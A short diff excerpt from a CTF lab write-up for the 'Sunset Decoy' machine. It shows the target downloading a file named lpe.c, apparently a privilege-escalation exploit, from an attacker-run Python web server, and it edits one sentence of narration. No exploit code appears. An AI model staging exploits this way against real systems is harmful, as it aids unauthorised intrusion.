Ha-L0/Ha-L0.github.io/_posts/2022-12-03-[H4]-Proving-Grounds-Play-VULNHUB-Sunset-Decoy.md

 2022-12-03 09:36:34 (3.16 MB/s) - ‘lpe.c’ saved [1267/1267
 ```

-At our attacker machine we see that the file got uploaded.
+At our attacker machine we see that the file was requested by the target after we executed the `wget` command.
 ```bash
 $ python3 -m http.server 80
 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...